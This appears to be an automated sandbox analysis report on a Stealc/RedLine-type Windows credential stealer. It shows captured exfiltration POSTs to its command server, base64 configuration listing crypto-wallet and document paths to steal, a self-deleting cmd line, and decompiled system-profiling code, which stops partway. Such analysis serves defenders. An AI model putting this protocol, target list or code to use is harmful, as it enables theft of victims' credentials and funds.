Mar 22, 2023 11:21:21.656224966 CET	1199	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: jerrysmith.online Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 61 33 34 37 64 32 66 31 34 64 31 38 66 35 39 62 66 64 33 31 37 63 35 35 33 63 38 38 38 65 64 65 39 35 33 32 61 38 65 35 63 64 61 63 35 32 30 30 30 31 34 36 31 37 30 36 35 61 30 63 65 38 64 39 64 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"wallets------FCAFIJJJKEGIECAKKEHI--
Mar 22, 2023 11:21:21.779136896 CET	1201	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:21 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1732 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 46 78 43 61 58 52 6a 62 32 6c 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 48 64 68 62 47 78 6c 64 43 35 6b 59 58 52 38 4d 58 78 43 61 58 52 6a 62 32 6c 75 49 45 4e 76 63 6d 55 67 54 32 78 6b 66 46 78 43 61 58 52 6a 62 32 6c 75 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 6b 59 58 52 38 4d 48 78 45 62 32 64 6c 59 32 39 70 62 6e 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 58 46 4a 68 64 6d 56 75 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 6b 59 58 52 38 4d 48 78 45 59 57 56 6b 59 57 78 31 63 79 42 4e 59 57 6c 75 62 6d 56 30 66 46 78 45 59 57 56 6b 59 57 78 31 63 79 42 4e 59 57 6c 75 62 6d 56 30 58 48 64 68 62 47 78 6c 64 48 4e 63 66 48 4e 6f 5a 53 6f 75 63 33 46 73 61 58 52 6c 66 44 42 38 51 6d 78 76 59 32 74 7a 64 48 4a 6c 59 57 30 67 52 33 4a 6c 5a 57 35 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 58 46 64 68 62 47 78 6c 64 46 64 68 63 32 46 69 61 56 78 44 62 47 6c 6c 62 6e 52 63 56 32 46 73 62 47 56 30 63 31 78 38 4b 69 35 71 63 32 39 75 66 44 42 38 52 58 52 6f 5a 58 4a 6c 64 57 31 38 58 45 56 30 61 47 56 79 5a 58 56 74 58 48 78 72 5a 58 6c 7a 64 47 39 79 5a 58 77 77 66 45 56 73 5a 57 4e 30 63 6e 56 74 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 78 63 52 57 78 6c 59 33 52 79 64 57 30 74 54 46 52 44 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 77 66 45 56 34 62 32 52 31 63 33 78 63 52 58 68 76 5a 48 56 7a 58 48 78 6c 65 47 39 6b 64 58 4d 75 59 32 39 75 5a 69 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 63 47 46 7a 63 33 42 6f 63 6d 46 7a 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 63 32 56 6c 5a 43 35 7a 5a 57 4e 76 66 44 42 38 52 58 68 76 5a 48 56 7a 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 78 63 52 57 78 6c 59 33 52 79 62 32 35 44 59 58 4e 6f 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 77 66 45 31 31 62 48 52 70 52 47 39 6e 5a 58 78 63 54 58 56 73 64 47 6c 45 62 32 64 6c 58 48 78 74 64 57 78 30 61 57 52 76 5a 32 55 75 64 32 46 73 62 47 56 30 66 44 42 38 53 6d 46 34 65 43 42 45 5a 58 4e 72 64 47 39 77 49 43 68 76 62 47 51 70 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49 46 4e 30 62 33 4a 68 5a 32 56 63 66 47 5a 70 62 47 56 66 58 7a 41 75 62 47 39 6a 59 57 78 7a 64 47 39 79 59 57 64 6c 66 44 42 38 53 6d 46 34 65 43 42 45 5a 58 4e 72 64 47 39 77 66 46 78 6a 62 32 30 75 62 47 6c 69 5a 58 4a 30 65 53 35 71 59 58 68 34 58 45 6c 75 5a 47 56 34 5a 57 52 45 51 6c 78 6d 61 57 78 6c 58 31 Data Ascii: Qml0Y29pbiBDb3JlfFxCaXRjb2luXHdhbGxldHNcfHdhbGxldC5kYXR8MXxCaXRjb2luIENvcmUgT2xkfFxCaXRjb2luXHwqd2FsbGV0Ki5kYXR8MHxEb2dlY29pbnxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8XFJhdmVuXHwqd2FsbGV0Ki5kYXR8MHxEYWVkYWx1cyBNYWlubmV0fFxEYWVkYWx1cyBNYWlubmV0XHdhbGxldHNcfHNoZSouc3FsaXRlfDB8QmxvY2tzdHJlYW0gR3JlZW58XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8XFdhbGxldFdhc2FiaVxDbGllbnRcV2FsbGV0c1x8Ki5qc29ufDB8RXRoZXJldW18XEV0aGVyZXVtXHxrZXlzdG9yZXwwfEVsZWN0cnVtfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3xcRWxlY3RydW0tTFRDXHdhbGxldHNcfCouKnwwfEV4b2R1c3xcRXhvZHVzXHxleG9kdXMuY29uZi5qc29ufDB8RXhvZHVzfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8cGFzc3BocmFzZS5qc29ufDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8c2VlZC5zZWNvfDB8RXhvZHVzfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHxcRWxlY3Ryb25DYXNoXHdhbGxldHNcfCouKnwwfE11bHRpRG9nZXxcTXVsdGlEb2dlXHxtdWx0aWRvZ2Uud2FsbGV0fDB8SmF4eCBEZXNrdG9wIChvbGQpfFxqYXh4XExvY2FsIFN0b3JhZ2VcfGZpbGVfXzAubG9jYWxzdG9yYWdlfDB8SmF4eCBEZXNrdG9wfFxjb20ubGliZXJ0eS5qYXh4XEluZGV4ZWREQlxmaWxlX1
Mar 22, 2023 11:21:21.779212952 CET	1201	IN	Data Raw: 38 77 4c 6d 6c 75 5a 47 56 34 5a 57 52 6b 59 69 35 73 5a 58 5a 6c 62 47 52 69 58 48 77 71 4c 69 70 38 4d 48 78 42 64 47 39 74 61 57 4e 38 58 47 46 30 62 32 31 70 59 31 78 4d 62 32 4e 68 62 43 42 54 64 47 39 79 59 57 64 6c 58 47 78 6c 64 6d 56 73 Data Ascii: 8wLmluZGV4ZWRkYi5sZXZlbGRiXHwqLip8MHxBdG9taWN8XGF0b21pY1xMb2NhbCBTdG9yYWdlXGxldmVsZGJcfCouKnwwfEJpbmFuY2V8XEJpbmFuY2VcfGFwcC1zdG9yZS5qc29ufDB8QmluYW5jZXxcQmluYW5jZVx8c2ltcGxlLXN0b3JhZ2UuanNvbnwwfEJpbmFuY2V8XEJpbmFuY2VcfC5maW5nZXItcHJpbnQuZnB8M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49697	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:21.825402975 CET	1202	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKKJJKJEGIECAKJJEB Host: jerrysmith.online Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 61 33 34 37 64 32 66 31 34 64 31 38 66 35 39 62 66 64 33 31 37 63 35 35 33 63 38 38 38 65 64 65 39 35 33 32 61 38 65 35 63 64 61 63 35 32 30 30 30 31 34 36 31 37 30 36 35 61 30 63 65 38 64 39 64 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 2d 2d 0d 0a Data Ascii: ------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="message"files------KKJKKJJKJEGIECAKJJEB--
Mar 22, 2023 11:21:21.958632946 CET	1203	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:21 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 792 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 6c 65 47 39 6b 64 58 4d 71 4c 6e 42 75 5a 79 77 71 5a 58 68 76 5a 48 56 7a 4b 69 35 77 5a 47 59 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 35 6e 4c 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 6b 5a 69 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 62 6d 63 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 52 6d 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 62 6d 63 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 6b 5a 69 77 71 62 57 56 30 59 57 31 68 63 32 73 71 4c 69 6f 73 4b 6c 56 55 51 79 30 74 4b 69 34 71 66 44 45 31 4d 44 42 38 4d 58 77 78 66 45 52 50 51 31 4e 38 4a 55 52 50 51 31 56 4e 52 55 35 55 55 79 56 63 66 43 70 6c 65 47 39 6b 64 58 4d 71 4c 6e 42 75 5a 79 77 71 5a 58 68 76 5a 48 56 7a 4b 69 35 77 5a 47 59 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 35 6e 4c 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 6b 5a 69 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 62 6d 63 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 52 6d 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 62 6d 63 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 6b 5a 69 77 71 62 57 56 30 59 57 31 68 63 32 73 71 4c 69 6f 73 4b 6c 56 55 51 79 30 74 4b 69 34 71 66 44 45 31 4d 44 42 38 4d 58 77 78 66 46 4a 46 51 30 35 55 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 5a 58 68 76 5a 48 56 7a 4b 69 35 77 62 6d 63 73 4b 6d 56 34 62 32 52 31 63 79 6f 75 63 47 52 6d 4c 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 53 52 55 4e 46 54 6c 52 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 45 52 56 4e 4c 66 43 56 45 52 56 4e 4c 56 45 39 51 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 77 3d Data Ascii: REVTS3wlREVTS1RPUCVcfCpleG9kdXMqLnBuZywqZXhvZHVzKi5wZGYsKndhbGxldCoucG5nLCp3YWxsZXQqLnBkZiwqYmFja3VwKi5wbmcsKmJhY2t1cCoucGRmLCpyZWNvdmVyKi5wbmcsKnJlY292ZXIqLnBkZiwqbWV0YW1hc2sqLiosKlVUQy0tKi4qfDE1MDB8MXwxfERPQ1N8JURPQ1VNRU5UUyVcfCpleG9kdXMqLnBuZywqZXhvZHVzKi5wZGYsKndhbGxldCoucG5nLCp3YWxsZXQqLnBkZiwqYmFja3VwKi5wbmcsKmJhY2t1cCoucGRmLCpyZWNvdmVyKi5wbmcsKnJlY292ZXIqLnBkZiwqbWV0YW1hc2sqLiosKlVUQy0tKi4qfDE1MDB8MXwxfFJFQ05UfCVSRUNFTlQlXHwqZXhvZHVzKi5wbmcsKmV4b2R1cyoucGRmLCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxSRUNFTlR8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxERVNLfCVERVNLVE9QJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49698	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:22.588946104 CET	1204	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEG Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:22.588999987 CET	1206	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:22.750438929 CET	1206	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49699	85.31.45.22	80	C:\Users\user\Desktop\B7VbZC8QLf.exe

Timestamp	kBytes transferred	Direction	Data
Mar 22, 2023 11:21:22.781447887 CET	1207	OUT	POST /410b5129171f10ea.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKF Host: jerrysmith.online Content-Length: 1747 Connection: Keep-Alive Cache-Control: no-cache
Mar 22, 2023 11:21:22.781528950 CET	1208	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 35 34 35 62 Data Ascii: ------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="token"ae545ba347d2f14d18f59bfd317c553c888ede9532a8e5cdac5200014617065a0ce8d9d8------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="file_name"ZmlsZXNcUkVDR
Mar 22, 2023 11:21:22.965188026 CET	1209	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 10:21:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: B7VbZC8QLf.exePID: 2492, Parent PID: 3324

General

Target ID:	0
Start time:	11:21:31
Start date:	22/03/2023
Path:	C:\Users\user\Desktop\B7VbZC8QLf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\B7VbZC8QLf.exe
Imagebase:	0x400000
File size:	368128 bytes
MD5 hash:	763C3550F4E0A97BAA4EBD6FC8C61996
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.351788229.0000000000916000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.351693750.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.352104857.00000000023F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.351827343.0000000000972000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5956, Parent PID: 2492

General

Target ID:	1
Start time:	11:21:51
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\B7VbZC8QLf.exe" & del "C:\ProgramData\*.dll"" & exit
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4332, Parent PID: 5956

General

Target ID:	2
Start time:	11:21:51
Start date:	22/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 6092, Parent PID: 5956

General

Target ID:	3
Start time:	11:21:51
Start date:	22/03/2023
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 5
Imagebase:	0xb70000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: B7VbZC8QLf.exePID: 2492, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	55.5%
Dynamic/Decrypted Code Coverage:	32%
Signature Coverage:	29.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	49

Executed Functions

Function 00409283 Relevance: 72.6, APIs: 38, Strings: 3, Instructions: 895
memoryregistrytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00409283(signed int __ecx, void* __eflags, char _a4) {
				char _v16;
				struct _SYSTEM_POWER_STATUS _v28;
				char _v40;
				void* _v44;
				char _v56;
				int _v60;
				struct _SYSTEMTIME _v76;
				char _v88;
				intOrPtr _v92;
				char _v104;
				char _v116;
				char _v128;
				char _v140;
				char _v152;
				char _v164;
				char _v176;
				char _v188;
				char _v200;
				char _v212;
				char _v224;
				char _v236;
				char _v248;
				char _v260;
				char _v272;
				char _v284;
				struct _SYSTEM_INFO _v320;
				unsigned int _v336;
				signed int _v340;
				int _v348;
				short _v524;
				char _v612;
				char _v1612;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t422;
				long _t443;
				intOrPtr _t463;
				CHAR* _t512;
				long _t539;
				void* _t556;
				CHAR* _t557;
				void* _t576;
				intOrPtr _t596;
				long _t636;
				long _t690;
				struct _MEMORYSTATUSEX* _t691;
				unsigned int _t692;
				void* _t709;
				intOrPtr _t710;
				int _t711;
				void* _t773;
				void* _t792;
				void* _t815;
				unsigned int _t833;
				signed int _t839;
				signed int _t848;
				void* _t849;
				signed int _t850;
				void* _t852;
				void* _t854;
				char* _t896;
				CHAR* _t928;
				void* _t954;
				char* _t962;
				CHAR* _t981;
				void* _t1029;
				void* _t1030;
				void* _t1031;
				void* _t1032;
				signed int _t1043;

				_t1038 = __eflags;
				_t848 = __ecx;
				E0040EA50( &_v16, __eflags, 0x40fbe1);
				_t844 = "\n";
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, __eflags, "\n"), _t848,  &_v16);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1038,  *0x613508), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1038, "\n"), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1038,  *0x61317c), _t848,  &_v16);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1038, "\n"), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1038,  *0x613058), _t848,  &_v16);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1038, "\n\n"), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1038,  *0x6130d8), _t848,  &_v16);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1038, "\n"), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1038,  *0x613004), _t848,  &_v16);
				E004016EF(_v40);
				_t422 = E0040D12F( &_v40); // executed
				E0040EAEF(E0040EB29( &_v16, _t848, _t422,  &_v28, _t1038), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1038, _t844), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1038,  *0x6132a0), _t848,  &_v16);
				E004016EF(_v40);
				_v60 = 0xff;
				_t896 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t443 = RegOpenKeyExA(0x80000002,  *0x6132e4, 0, 0x20119,  &_v44); // executed
				_t1039 = _t443;
				if(_t443 == 0) {
					RegQueryValueExA(_v44,  *0x61337c, 0, 0, _t896,  &_v60); // executed
				}
				RegCloseKey(_v44);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1039, _t896), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1039, _t844), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1039,  *0x61354c), _t848,  &_v16);
				E004016EF(_v40);
				_v44 = _v44 & 0x00000000;
				_push( &_v44);
				_push(GetCurrentProcess());
				if( *0x613778() == 0) {
					L4:
					_t463 =  *0x613214; // 0x23fa1c8
				} else {
					_t1041 = _v44;
					_t463 =  *0x6130cc; // 0x23fa178
					if(_v44 == 0) {
						goto L4;
					}
				}
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1041, _t463), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1041, _t844), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1041,  *0x6130f8), _t848,  &_v16);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1041, E0040D204(_t848)), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1041, _t844), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1041,  *0x613260), _t848,  &_v16);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1041, E0040D236(_t848)), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1041, _t844), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1041,  *0x61319c), _t848,  &_v16);
				E004016EF(_v40);
				_t512 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				GetLocalTime( &_v76);
